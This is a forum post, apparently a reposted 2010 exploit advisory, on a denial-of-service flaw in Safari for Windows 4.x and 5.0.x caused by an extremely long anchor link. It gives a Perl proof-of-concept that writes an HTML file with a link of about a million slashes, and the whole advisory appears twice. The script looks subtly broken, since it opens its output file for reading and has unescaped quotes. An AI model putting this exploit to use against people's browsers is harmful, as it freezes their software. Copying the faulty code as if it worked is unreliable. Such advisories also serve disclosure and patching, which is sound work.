Safari for windows Long link DoS
Page 1 of 1
Safari for windows Long link DoS
############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Vendor notified:Yes exploit available: YES
############################################
Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
windows 7 Ultimate:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
####################
Proof Of Concept
####################
#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Safari 5.0.1 ( 7533,17, and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href="about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "">click here if you can </a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Vendor notified:Yes exploit available: YES
############################################
Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
windows 7 Ultimate:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
####################
Proof Of Concept
####################
#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Safari 5.0.1 ( 7533,17, and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href="about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "">click here if you can </a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics
» Safari for Windows 3.2.1 Remote http: URI handler DoS
» How ro check link "nofollow" status in Windows 7
» Bonus Safari XXE (only affecting Safari 4 Beta)
» Why to Use long tail keywords
» iPhone and Safari advisories
» How ro check link "nofollow" status in Windows 7
» Bonus Safari XXE (only affecting Safari 4 Beta)
» Why to Use long tail keywords
» iPhone and Safari advisories
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|